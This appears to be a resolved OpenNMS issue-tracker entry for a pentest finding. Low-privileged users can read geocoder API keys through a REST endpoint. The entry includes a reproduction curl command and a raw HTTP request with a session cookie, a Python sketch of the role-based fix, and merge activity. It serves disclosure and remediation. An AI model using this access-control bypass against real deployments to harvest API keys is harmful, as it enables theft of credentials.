Missing Access Control on "Geocoder Configuration"

Description

Overview

Access Controls help an application determine which users should have access to which resources based on user roles, responsibilities, or other relevant criteria. For example, an application dealing with Personally Identifiable Information (PII) should allow only authorized users to view or edit stored PII, and deny access to users who do not need to access it.

Access Controls are “Broken” when a user can access resources they are not authorized to access. An attacker who bypasses the access control mechanisms of a web application gains unauthorized access to resources that lie outside their permissions.

Broken access control can allow attackers to:

  • Access resources only accessible to certain users, thus allowing unauthorized access to data

  • Perform operations on behalf of other users, leading to account takeovers in the worst cases

  • Attempt privilege escalation

  • Attempt to take over an account


During the tests, it was determined that users with low privileges could view *Geocoder Configuration* information without authorization.

Browser URL

https://pentest24.eastus.cloudapp.azure.com/opennms/api/v2/geocoding/geocoders

Steps To Reproduce

1-) Log in to the application and navigate to the https://pentest24.eastus.cloudapp.azure.com/opennms/admin/geoservice/index.jsp#/!/geocoding/config URL.

  • As seen in the screenshot below, a user with low privileges cannot view the *Geocoder Configuration* page.

![user_geoservice_index_error.png](https://api.us.cobalt.io/v1/attachments/att_dtN4g9V/preview)

2-) Send a request to the `/opennms/api/v2/geocoding/geocoders` API endpoint using the *cURL* command given below:

  • Replace the session cookie information with a valid value before using the command.
    ```
    curl --path-as-is -i -s -k -X $'GET' \
      -H $'Host: pentest24.eastus.cloudapp.azure.com' \
      -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' \
      -H $'Accept: application/json, text/plain, */*' \
      -H $'Accept-Language: en-US,en;q=0.5' \
      -H $'Accept-Encoding: gzip, deflate, br' \
      -H $'X-Requested-With: XMLHttpRequest' \
      -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' \
      -H $'Te: trailers' -H $'Connection: close' \
      -b $'JSESSIONID=node0hhp7txpignd6ss7h5xsxcppx150300.node0' \
      $'https://pentest24.eastus.cloudapp.azure.com/opennms/api/v2/geocoding/geocoders'
    ```

  • As seen in the screenshot below, a user with low privileges can access API keys and similar sensitive data by sending a request to the `/opennms/api/v2/geocoding/geocoders` API endpoint:

![user_api_v2_geocoding_geocoders.png](https://api.us.cobalt.io/v1/attachments/att_fFayiya/preview)

Severity

medium

A low-privileged user can retrieve the *Geocoder Configuration* details, which include *API* keys and other sensitive information.

Suggested Fix

It is suggested to implement proper access control checks on the affected endpoint so that it is not accessible to low-privileged users; the API should enforce the same authorization as the *Geocoder Configuration* page that already denies them.
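The following added example is not OpenNMS code; it models the authorization decision the suggested fix calls for, with constructed sessions, a constructed geocoder list, and assumed role names (`ROLE_USER`, `ROLE_ADMIN`). The "before" policy lets any authenticated session read the geocoding API, which is the finding above; the "after" policy limits it to administrators, so a low-privileged session receives 403 instead of the configuration.

```python
# Added example (not OpenNMS code): role-based check for the geocoding API.
# Role names, users and the geocoder data below are constructed for illustration.
from dataclasses import dataclass, field

GEOCODER_PATH = "/opennms/api/v2/geocoding/geocoders"

# Constructed sample of what the endpoint returns; the apiKey is why it is sensitive.
GEOCODERS = [
    {"id": "google", "active": True, "config": {"apiKey": "CONSTRUCTED-SAMPLE-KEY"}},
    {"id": "nominatim", "active": False, "config": {"email": "noc@example.invalid"}},
]


@dataclass
class Session:
    user: str
    roles: frozenset = field(default_factory=frozenset)


# Route policy: which roles may call which path prefix.
# "Before": the geocoding API only required an authenticated session (any role).
POLICY_BEFORE = {"/opennms/api/v2/geocoding/": {"ROLE_USER", "ROLE_ADMIN"}}
# "After": configuration endpoints need ROLE_ADMIN, matching the admin-only UI page.
POLICY_AFTER = {"/opennms/api/v2/geocoding/": {"ROLE_ADMIN"}}


def authorize(session, path, policy):
    """True only if a role of the session is allowed for the longest matching prefix."""
    if session is None:
        return False
    best = max((p for p in policy if path.startswith(p)), key=len, default=None)
    if best is None:
        return False  # deny by default: paths without a policy entry are not reachable
    return bool(session.roles & policy[best])


def handle_get(session, path, policy):
    """Minimal handler: 401 without a session, 403 when the role check fails, else 200."""
    if session is None:
        return 401, None
    if not authorize(session, path, policy):
        return 403, None
    if path == GEOCODER_PATH:
        return 200, GEOCODERS
    return 404, None
```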

Prerequisites

A user account with low privileges is required.

HTTP Request

```http
GET /opennms/api/v2/geocoding/geocoders HTTP/1.1
Host: pentest24.eastus.cloudapp.azure.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Cookie: JSESSIONID=node0hhp7txpignd6ss7h5xsxcppx150300.node0
```

Cobalt URL

#PT22584_6

Acceptance / Success Criteria

None

Attachments

2

Activity

Christian Pape July 9, 2024 at 5:58 AM

Merged.

Christian Pape July 5, 2024 at 5:41 AM

Please review:
* PR:

Fixed

Created June 13, 2024 at 6:31 PM
Updated July 9, 2024 at 5:58 AM
Resolved July 9, 2024 at 5:58 AM